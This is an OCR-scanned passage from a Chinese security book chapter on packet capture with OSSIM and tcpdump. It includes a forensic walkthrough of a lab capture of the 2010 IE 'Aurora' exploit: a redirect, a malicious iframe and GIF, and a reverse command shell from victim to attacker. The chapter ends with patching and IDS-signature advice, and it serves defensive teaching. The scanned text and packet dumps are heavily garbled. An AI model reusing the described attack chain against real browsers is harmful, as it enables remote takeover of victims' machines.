11: 8.594789 IP 192.168.11.6.56368 > 192.160.11.1.53: 29920+ A? client s4.google.com. (37) 

db 8.601524 IP 192.168.11.1.53 > 192.168.11.6.59388: 29920 8/0/0 CNAME cilients.l.google.com., CNAME clients-c 
|hina.l.google.com., A 74.125.204.113, A 74.125.204.138, A 74.125.204.139, A 74.125.204.100, A 74.125.264.101, A 7 
4.125. E 102 (185) 

11 0.951587 IP 192.168.11.105.51932 > 192.48.79.30.53: 37478 [lau] A? www.ibn.con. (40) 

dl 095875 IP 192.48.79.30.53 > 192.168.11.105.51932: 37478- 0/12/11 (875) 

n 007682 IP 192.168.11.165.31164 > 184.26.151.64.53: 29501 [lau] A? www.ibm.com. (40) 

n .097867 IP 192.168.11.165.38222 > 72.246.45.57.53: 62855% [lau] A? usc2.akam.net. (42) 

1l .098047 IP 192.168.11.105.59853 » 95.100.174.67. 39529% [lau] AAAA? usc2.akam.net. (42) 

ni .098232 IP 192.168.11.105.2074 » 23.211.61.67.53: 9482* [lau] A? ns1-206.akan.net. (45) 


.098490 IP 192.168.11.105.17568 > 193.108.91.67.53: 11550* [lau] AAAA? ns1-99.akam.net. (44) 
[11:51 .098730 IP 192.168.11.105.19499 > 96.7.49.57.53: 51016% [lau] AAAA? nsi-206.akam.net. (45) 


实例 3: 如 果 只 为 了 捕获 80 端口 上 的 TCP 流量 ， 则 添加 and tcp 参数 即 可 。 


|yirtuatUSsMALLInone:-# tcpdump -n -c 2 -i ethg -s © port 80 and tcp 

tcpdump: verbose output suppressed, use -v or -vv for full protocol decode 

listening on eth, link-type ENIOMB (Ethernet), capture size 65535 bytes 

11:53:52.485394 IP 192.168.11.105.60173 > 74.121.134.252.80: Flags |F.], seq 2727579738, ack 3323544525, win 85 
, length 6 


|11:53:52.485885 IP 192.168.11.105.49690 > 222.161.252.52.80: Flags [P.], seq 628393613:628304187, ack 109354124 
win 74, length 374 

2 packets captured 

2 packets received by filter 

[0 packets dropped by kernel 

IVirtualUSMAllInOne:-4 


10.5.2 ”其 他 常见 过 滤器 使 用 方法 
在 上 面 实 例 中 ，icmp.pcap 中 过 滤 某 台 主 机 流量 : 
#tcpdump -n -r icmp.pcap host 192.168.11.1 
来 自 〈 源 地 址 过 滤 ) 某 主 机 的 流量 : 
#tcpdump -n -r icmp.pcap src host 192.168.11.1 
过 滤 捕 获 流向 某 主 机 的 流量 : 
#tcpdump -n -r icmp.pcap dst host 192.168.11.1 
捕获 流向 某 网 络 的 流量 : 
#tcpdump -n - icmp.pcap dst net 192.168.11.0 


有 时 我 们 在 检查 网 络 连通 情况 时 ， 需 要 过 滤 出 ICMP 的 应 答 响应 ， 操 作 如 下 : 
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length 40 
VirtualUSMAllInOr # 


使 用 tcpdump 除了 可 以 更 详细 地 显示 流量 ， 还 能 从 结果 中 提取 更 多 细节 ， 例 如 ， 加 入 -tttt 
参数 告诉 tepdump 将 时 间 戳 显示 为 年 月 日 的 格式 ，-e 参数 添加 2 层 头 部 信息 ，-XX 参数 以 十 
六 进 制 和 ASCII 格式 显示 所 有 头 部 和 数据 ， 如 图 10-21 所 示 。 


lienvault:/tmp# tcpdump -n -tttt -e -XX -r /tmp/icmp.pcap “icmp[icmptupe]=icnm| 
Ip-echoreply' and dst host 192.168.91.1 
reading from file /tnp/icmp.pcap, link-type EN10MB (Ethernet) 
[2015-07-08 03:40:26.821279 00: 4:48:49 > 00:50:56:c0:00:08, ethertype IPu4 
(0x0800), length 74: 192.168.91.227 > 192.168.91.1: ICMP echo reply, id 1, seq 
31, 40 
0x0000 : 56c0 0008 000c 2994 4849 0800 4500 
0x0010: 1183 0000 4001 3109 c0a8 5be3 c0a8 
0x0020 0000 553c 0001 001f 6162 6364 6566 ë 3 
0x0030 : 696a 6b6c 6d6e 6f70 7172 7374 7576 ghi jklmnopqrstuu 
0x0040: 77 6263 6465 6667 6869 vabcdefghi 


图 10-21. 显示 ICMP 应 答 响应 


下 面 这 个 例子 用 来 研究 多 个 抓 包 内 容 , 在 /tmp 目录 下 具有 多 个 抓 包 文件 iemp.pcap. ip.pcap 
等 。 当 你 想 搜 索 所 有 pcap 文件 时 该 怎么 操作 ? 下面 我 们 利用 for 循环 和 find 命令 可 在 所 有 文 
件 中 查找 主机 192.168.91.227 的 TCP 流量 信息 ， 如 图 10-22 所 示 。 


lienvault:/tmp# for i in ‘find /tmp/ -type f `; do tcpdump -n -c 1 -r $i host 1 

92.168.91.227 and tcp; done 

cpdump: truncated dump file; tried to read 4 file header bytes, only got 0 

cpdump: unknown file format 

cpdump: unknown file format 

eading from file /tmp/icmp.pcap, link-type EN10MB (Ethernet) 

eading from file ^tmp/uireshark ethO 20150708032756 8NuPGu, link-tuype EN10MB (E| 

hernet) 

tcpdump: truncated dump file; tried to read 4 file header bytes, only got 0 

eading from file /tmp/ip.pcap, link-type EN10MB (Ethernet) 

3:54:59.890861 IP 216.58.221.68.80 > 192.168.91.227.42371: Flags [R.1, seq 9416| 

B3309, ack 4107026272, win 64240, length 0 

reading from file /tmp/123.pcap, link-type EN10MB (Ethernet) 

3:26:11.060066 IP 192.168.91.227.60675 > 64.62.160.45.80: Flags [S], seq 230669| 
1, win 5840, options [mss 1460,nop,nop,sack0K,nop,wscale 10], length 0 

lienvault:/tmp# 


图 10-22 过滤 出 多 个 包 的 内 容 


10.5.3 ”通过 Traffic Capture 抓 包 存储 

从 维护 的 角度 看 ， 对 于 抓 包 存放 的 位 置 是 操作 者 必须 了 解 的 内 容 ， 系 统 抓 的 pcap 数据 包 
会 存放 在 /var/ossim/traffic/ 目 录 下 。 例 如 : Netscan admin 138901088 10 192.168.150.130.pcap. 
如 果 是 分 布 式 OSSIM， 则 抓 的 包 存 放 在 相应 Sensor 的 /var/ossim/traffic/ 目 录 中 。 
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针对 IE 浏览 器 漏洞 的 攻击 分 析 


下 面 将 要 为 读者 做 一 个 漏洞 的 攻击 分 析 , 在 2010 年 有 一 个 Oday 漏洞 名 叫 极 光 漏 洞 , 它 是 
IE 的 一 个 缓冲 区 溢出 漏洞 ， 利 用 这 个 漏洞 进行 攻击 的 程序 实例 介绍 如 下 。 

受害 者 IP: 192.168.100.206， 攻 击 者 IP: 192.168.100.200。 

由 于 在 Windows 系统 的 IE6/7/8 等 版 本 中 ， 存 在 零 日 漏洞 ,没有 修复 此 漏洞 的 客户 端 ， 有 
可 能 被 攻击 者 的 网 页 挂 马 导致 任意 代码 执行 , 这 里 所 举 的 例子 中 , 受害 者 就 是 使 用 了 Windows 
XP+SP3+IE6 的 系统 。 下 面 讲述 通过 OSSIM 抓 包 并 分 析 可 疑 数 据 包 的 过 程 。 

在 OSSIM 下 抓 包 发 现 了 一 些 可 疑 数据 包 ， 我 们 分 析 这 些 数 据 包 的 内 容 。 首 先 受 害 者 和 攻 
击 者 之 间 进 行 了 三 次 握手 ， 而 且 初 始 化 连接 的 目标 端口 是 80， 很 显然 属于 HTTP 流量 。 从 第 
13 个 数据 包 ， 能 看 出 这 是 一 个 对 /info 的 HTTP GET 请 求 ， 在 图 10-23 所 示 中 用 绿色 标 出 的 部 
4. 


Start timaiel Mag 3 060451430 2024 End 


ime: Fri Asp D O015 Filter: i oar 
Capture duration:? seccnds Nonber of packets:119 File size: Filter: B^ po 


mo cim scarce Protocol info. 
u 2 o! e ? [SYN] seq-0 Nin-C4240 Len-O 
u 2 6 i, ACK] Seq=0 AckeL W: 
12 2 e 
u 2 36 
u 2. e 
15 2 ce 59 
16 2.06 - e 
E a ico e 
19 2 Tcp a 
sheckerve-flash, */* VV! image/gif, image/n-wbitmap, image/jpeg, image/pjpeg application/s-ah 
a/4.0 (compatible; MSIE 6.0; Windows Y "i 


图 10-23 GET 请 求 


当 攻击 者 的 机 器 收 到 GET 请 求 后 , 并 在 第 50 个 数据 包 中 返回 了 一 个 302 返回 码 , 其 含义 
是 用 于 浏览 器 重 定向 到 另 一 个 页 面 ， 如 图 10-24 所 示 。 
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Start tine:rs Aug i 08:51: 


0 2014 Ead time:F-i Avg = 


Captire guration: 7 sans Number of pastera: i9 File etmeiiiioi sy ae == a Tay 
u 3.070438000 — 192.166.11.216 192.169.11.212 E 33416 > 443 [ACK] Seq-6219 A-k-2521 Win-16291 en-0 
5 3.070465000 — 192.166.11.216 192.168.11.212 so ITEP Window Update] 53216 > 443 [ACK] Seq-619 Ack-2321 W 
m 3.0049:000 — 192.166.:1.216 192.169.:1.212 so 53216 > 443 Beq-619 At-3189 win-16367 1en-0 
tz 3.070513000 — 192.166.11.216 192.168.11.212 so 53217 > 443 Seq-635 Ach-1173 Win-16310 1en-0 
sa 3.070536000 — 192.166.:1.226 192.168. so 53715 > 443 [ACK] Seq-635 Act-5149 Win-16298 1en-0 
图 3.080566000 ^ fe30::14ed:staci7RiB;38:0 regis 28 MesmARCH » Emrp/ .1 
E 3.687881000 — 192.166.:00.207 192.168. 19 ITP/ 302 Moved 
E: 3.089121000 192.166.100.206 122.168. 359 GET inEeT-FENELULITP HTTP/1.1 
52 3.304399000 — 192.166.:3.212 122.168. 1354 Applicaton Data, Application Deta 
s s169000 192.166.121.216 192.168. so 53214 > 443 [ACK] Seq-1445 Ack-1149 Win-l6201 Tea-0 
E 3.305299000 — 192.166.11.212 122.16. 2974 rc segment of a zeamsembled PIU 
P FRAME SU: 191 BYTES OW WING (1529 BITS), :91 BYTES CAPTURED (1529 DITS) ON INTERFACE 0 
上 PHPRNPT I1, SRCY 00:27:83: RPi$1:EE 100123 ?358Pr93 EE), DT: 00+0Cr29+ 7+REY27 (0010C12910T:AE:27) 


te 19216010020 (122100,2 00: 206) 
本 
ARTE moror 

p 
lervar) Apache ein: Apache 
3*3 5 


50 3.007887000 192.169.100.202 -> 192.169.100.206 ETPP 191 MTTP/1.3 302 Moved 
9010 00 Bi 4t Q0 BO 3€ at e7 cO ad 64 ca cO a8 
0030 €i ae 34 97 »& 00 $i 

oaan fede Se ao 48 sa 31 je 31 30 


9060 Ge Od GE G3 61 74 Ja 20 4f 69 te — L..Lecatien: /in 
ooo ei er HERES ie ta do 10 30 — fole keWELUILIMEP 
Goao od Sa PEE] Ga ja 20 «b és — --Cennection: Ke 
Goo gs 7a Ee Go yen $232 16 65 à opoaiive. server 
Oond Sa 20 fi 63 G6 e EE te 14 Apache. Conton 
Goko 7i 2a Ga G7 A 6R Ja 20 30 Od Da Cd Ca geR1 0 


图 10-24 浏览 器 被 重 定向 


注意 这 个 Location 域 ， 它 指明 重 定向 的 位 置 是 /info?rFfWELUijiLJHpP， 这 些 内 容 好 像 是 
<scripf> 标 签 内 的 一 些 随机 字母 ， 而 这 些 类 似 乱码 的 随机 字母 ， 则 可 能 被 攻击 者 经 过 了 特殊 编 
码 而 逃避 检测 。 接 下 来 ， 我 们 发 现 了 一 些 更 有 用 的 信息 ， 如 图 10-25 所 示 。 


Stert timeidun Nov 3 02:42:13 2024 Ead timerfun Nav 3 (2rd 
Captare rationis seconds Mumoer of packetail77 File 人 16133330 Fyre 


mo. ume eure Destination rasecoi raneta anto. 
4 O.394838000 —— 193.168.102.30€ 192.168.100.202 ar n E E ME 
i O.688870000 — 193.185.:00.306 € 1031 > #0 [ACK] Seq-AMi Ack=148 Win-é4053 Len-0 

ie  s.a7as12000 192.168.109.206 ^ 1982.» 4321 [SYM] Seque Wine4245 Len- MS8-1469 SACK TERME 
10b — #,378918000 — 192.165. :00.206 e 10m > IACK] seq-1 Ackel Win=64240 Leno 

10e — 3.80:939000 192.169.202.206 192.158.109.202 e 1032» [ACK] Segel Ackos Wiacéi236 Len-o 

iii —— 3. 640998000 192.168.109.206 192.168.109.202 s iio IPSM, ACK) Segui Ack«24s Win-63896 Len=39 

124 —— 3840033000 192.169.209.206 192.168.109.202 " 1092 > IPSM, ACK) Sec=i0 acxr245 Rin=63996 Len=83 


b FRAME it 475 BYTES ON UIRE (3000 BITS), 175 BYTES CAPTURED (3809 BITS) CM INTERFACE 9 
E ETHERNET ii, SACt O01OC:2907t AR: 37 (QUISCIIRICTIARIST), DST: OOISSIBRIBPIMIIER (00128 1B31EFI S1 NEE) 
F TRANSMISSION CONTROL PROTOCOL, SAC POAT: 1031 (1931), DST PORTI #0 (80), SiO: 1, ACK! 1, LEM: 421 —— 
S HYPERTEXT TRANSFER PROTOCOL 
VOY GET /iNTOMTVECODYJWNT r AYVKYAPAVPOCMJNTSZUNTEVJMZCNWKKJCECİEPUJECTOTINSTENAKSVXİ. git NTTE/ IN 
Fever: Inf. (Chat/ sequence) f GET /zntcwrVmed2IUNNEerdrvAL LAE CCMA ESZUK New Ci Eline. os MITR/i i veVAE 
Nechodr GET: GET 


atest Versioni HIIR/1.i: AIIP Ac 8 te bio SS 


an£cuNueGDS Oi a caria Xara Pe CH Re S2 ue EV wal Cay Ec PuJPEete 


ooto "00 18 b3 bf 9i ee 00 Oc 19 07 ae 27 O* O0 48 


E A usc 
ES p 
ES Sume 
ES Ext 
ES BUR de 
ES RE m 


1025 ”服务 器 发 送 内 容 包含 了 可 疑 的 iframe 
注意 图 中 给 出 的 URI: 


645 
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/infowTVeeGDYJWNfsrdrvXiYhpnuPoCMjRrSZuKtbVgwuZCXwxKjtEclbPuJPPCEcflhsttMRrSYx1.gif: 


这 是 个 恶意 的 嵌 套 ， 很 可 能 是 包含 在 <span></span> 标 签 内 ， 这 些 文本 很 长 ， 包 含 了 不 可 阅读 
的 字符 串 ， 这 是 攻击 者 惯用 的 手法 。 这 样 用 户 无 法 察觉 ， 这 个 奇怪 的 GIF 文件 有 什么 用 呢 ， 这 绝 
不 是 什么 图 片 。 另 外 ， 大 家 注意 Graphs 按钮 内 容 ， 显 示 了 Wireshark 的 VO 图 像 ， 它 可 以 描绘 网 
络 上 的 吞吐 量 ， 分 析 者 利用 这 些 图 便 可 找到 不 同 协议 数据 吞吐 的 峰值 ， 如 图 10-26 所 示 。 


Graphs: All Traffic 


10-26 ”反映 吞吐 量变 化 
该 GIF 文件 很 有 可 能 用 来 触发 某 种 代码 ， 如 图 10-27 所 示 。 


Start tima:aun Nov 2 o; 
Capture duration 


"o Tima Dautination Protocor tangin ete 
1 0.000000000  10.32.14.282 p 25 Helis (state Activel 

2 o.155927000 — 10.22.14.253 p 62 Hello (etate Standby) 

3 — 0.276013000  10.53.14.282 xen éa Mello (state Active) 

4 —— 0.294BB8020 192.168.100.206 WIR ues o Veeco Mera VALYAPRUDOCH issueeveraz enti EO lDPU) 
5 —— 0.410088099 — 10.33.14.283 sao «a ello (atate scanapy) 

€ 0495069000 192.169.100.202 Tce 60 Bo > 1031 [ACK] Seq-i Ack-422 Win=64518 Lem-o 

7 0.487864000 192.168.100.202 182.168.100.266 HT 301 — WITB/i.i 200 OK (GIFB94) (GIFSSe) (image/gif) 

f^ 0.584778000 — 10.92.14.282 224.0.0.2 p éi Melio (stete Active) 

9  o.6o9381000 10.332.14.131 10.32.14.133 TLSvi 752 Application Data, Application Data 

10 — 0.609416000  10.32.14.133 10.32.14.131 Tce 54 343 > 60794 [ACK] Seq=1 Ack=693 Win-22 Len=0 

11 9689870000 192.168.100.206 192.162.100.202 Tc éo —— i031 > s0 [ack] Seq-i22 Ack-li Win-64093 Len-o 

1a — 0.683114000 — 10.33.14.283 a24.0.0 m" éz Heiis (atate scanapy) 

13 .0,808038000 .10,32.14.252 224.9.0.2 HSRe 62. Hello (state Active) 


P FRAME 7: 201 BYTES ON WIRE (160% BITS), 201 BYTES CAPTURED (1608 BITS) ON INTERFACE 0 
> ETHERNET II, SRC: 00:251B3:BF:91:EE (00:28:83:8F:91:E£), DST: 00:0C129:07:AE127 (00:0C129:07:A£:27) 

> INTERNET PROTOCOL VERSION 4, SRC: 192.168.100.202 (192.168.100.202), DST: 192.168.100.206 (192.168.100.206) 
P TRANSMISSION CONTROL PROTOCOL, SAC PORT: 30 (0), DST PORT: 1031 (1091), SEQ: 

P HYPERTEXT TRANSFER PROTOCOL 


1 Global settings: 
kground color index: 
Global color map: 200220000000: 00:00:00:00:09:00 
> Extension: Graphics Control: 

E Ta: 

Trai: 


(1 bit per color) (i bit per pixel) 


7o 100.202 -> 192. oox (erresa) 
090 30 33 bs bf 91 

0019 0 06 a4 cd ci 

8620 50 ed b? cd 

Et & E7 es af 

2030 20 34 33 0d 

2828 E: E 

aopo 20 o 

00c0 01 Q0 00 02 02 00 


10-27 GIF 文件 很 可 能 用 来 被 触发 某 种 代码 
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第 10 章 基于 B/S 架构 


据 包 捕获 分 析 


从 图 10-28 我 们 清楚 看 到 一 个 Windows 命令 行 解释 器 ， 这 个 shell 是 由 受害 者 发 给 服务 器 
的 ， 这 表明 攻击 者 成 功利 用 了 漏洞 ， 我 们 甚至 可 以 看 到 攻击 者 和 受害 者 的 交互 ， 即 输入 dir 命 
令 ， 列 出 受害 者 机 器 的 目录 。 这 样 攻击 者 对 受害 者 机 器 就 有 了 管理 权限 。 


4 End timoiri Cot 31 5 


of Fachets:154 File sia 
m. Time Protccor Verein Tato. 
n 17009 xr ie 
» L909 1E e 
» 55200 Tc € 
" 25300 see a 
» asooo sE a 
» 3.763277900 mi m . Roplication Data 
LI .801063009 Tc s 443 > 69124 [ACK Seq=l Ack=639 Winell Lenso 


n 3.502825000. 
n 3.90302200 


x e 4321» 1232 [ACK] Sedes Ackes Hine65399 Lene 
153 > 4321 [PB4, ACH] Seqcs Ack-5 Win-63993 


n 3.509560. 
n 537419009 
s 4.030110000 
P ETHERNET II, SRC: 00:0Ci2$ 


P INTERNET PROTOCOL VERSION 4, SRC: 192 
TRANSMISSION CCNTRCE PROTOCOL, SRC 


67 73 5c dl 54 ed 
72 Sc 44 63 73 6b 78 
3133 2 32 20 3130 
dd 20 20 22 20 3c 

20 29 20 20 2e 2d 0a 30 37 2f 
3520 20 30 35 Ja 33 33 20 5 
0100 20 3s 4i 49 52 3e 20 20 29 20 20 20 20 20 20 20 <DIR> 


10-28 


以 上 整个 过 程 只 需要 几 秒 钟 ， 而 对 于 管理 员 很 难 捕获 到 这 一 变化 。 下 面 我 们 开始 梳理 
OSSIM 中 的 流量 抓 包 功 能 Traffic Capture)， 看 看 它 如 何 找到 这 些 可 疑 数据 包 。 

首先 ，OSSIM 的 一 块 网 卡 和 交换 机 SPAN 口 连接 ， 正 常情 况 下 能 分 析 所 有 的 数据 包 。 某 
时 刻 遇 到 这 样 的 场景 , 受害 者 接收 到 了 可 疑 邮 件 里 面 的 图 片 ， 并 单 击 了 该 图 片 , 这 对 于 浏览 者 
而 言 在 平常 不 过 了 , 可 是 图 片 背 后 的 链接 却 向 攻击 者 的 恶意 网 站 发 送 了 一 个 GET 请 求 。 接着， 
攻击 者 的 Web 服务 器 向 受害 者 发 送 了 302 重 定向 ， 这 样 一 来 ， 受 害 者 的 浏览 器 就 向 重 定向 后 
的 URL 发 起 了 另 一 个 GET 请 求 。 攻 击 者 的 Web 服务 器 向 这 位 客户 端 发 送 了 含有 恶意 嵌 套 GIF 
图 像 连接 的 帧 (iframe)， 受 害 者 从 服务 器 上 下 载 了 GIF， 这 样 利 用 IE 浏览 器 漏洞 ， 便 执行 了 
隐藏 的 PayLoad， 并 打通 了 受害 者 到 攻击 者 的 网 络 通道 ， 该 Payload 产生 了 一 个 命令 行 解释 器 
到 攻击 者 的 计算 机 ， 以 便 远 程控 制 目标 。 

应 对 这 种 攻击 , 首先 还 是 需要 在 受害 者 计算 机 上 安装 最 新 系统 并 及 时 打 系 统 补 丁 , 对 于 网 
络 管理 方 ,利用 前 面 介绍 的 Snort 章节 的 内 容 ， 使 用 这 个 捕获 文件 为 IDS 创建 一 个 签名 ， 主 要 
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是 获取 特征 码 ， 为 所 有 包含 302 重 定向 到 特定 URL 的 HTTP 流量 也 写 一 个 签名 ， 便 有 助 于 检 
测 这 种 攻击 。 当 然 在 生产 环境 中 遇 到 的 情况 千差万别 , 用 这 一 思路 再 加 上 一 些 耐 心 的 调整 ， 一 
定 能 够 对 你 有 所 帮助 。OSSIM 系统 的 漏洞 扫描 功能 也 能 助 一 辟 之 力 ， 如 图 10-29 所 示 ， 漏 洞 
库 中 就 有 极光 IE 0 day 漏洞 的 信息 。 


REPORTS CONFIGURATION 


10-29 ”极光 漏洞 库 查 询 


小 结 


本 章 主要 讲解 了 包 分 析 和 过 滤 技 术 的 诸多 细节 和 技巧 , 主要 讲解 了 OSSIM 下 基于 Web Jj 
式 的 抓 包 技术 ， 后 台 其 实 是 tshark 这 个 命令 行 工 具 在 起 作用 , 包括 tepdump 的 过 滤 技巧 ， 并 对 
各 种 端口 协议 和 过 滤 方 法 做 了 详细 讲解 。 数 据 包 分 析 有 很 多 乐趣 , 读者 只 有 不 断 在 实践 中 多 加 
练习 ， 灵 活 使 用 这 些 技巧 ， 才 能 快速 解决 各 种 问题 。 
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